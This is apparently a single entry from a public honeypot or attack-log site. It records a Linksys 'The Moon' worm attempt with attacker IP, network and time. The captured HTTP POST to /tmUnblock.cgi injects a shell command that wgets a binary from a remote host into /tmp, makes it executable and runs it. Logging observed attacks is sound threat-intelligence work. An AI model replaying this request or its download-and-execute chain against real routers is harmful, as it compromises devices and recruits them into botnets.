This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-1 of 1 results (1 page)

Linksys "The Moon" Worm

[Attack info]
Attacker: 221.13.203.135
Dest. port: 8080
Time: 10/08/2019 14:46:32
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS4837 CHINA UNICOM China169 Backbone
Location: Henan, Anyang
POST /tmUnblock.cgi HTTP/1.1 Content-Length: 227 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: python-requests/2.20.0 Host: 159.89.182.124:80 Content-Type: application/x-www-form-urlencoded ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+jno.mpsl%3B+wget+http%3A%2F%2F159.89.182.124%2Fankit%2Fjno.mpsl%3B+chmod+777+jno.mpsl%3B+.%2Fjno.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1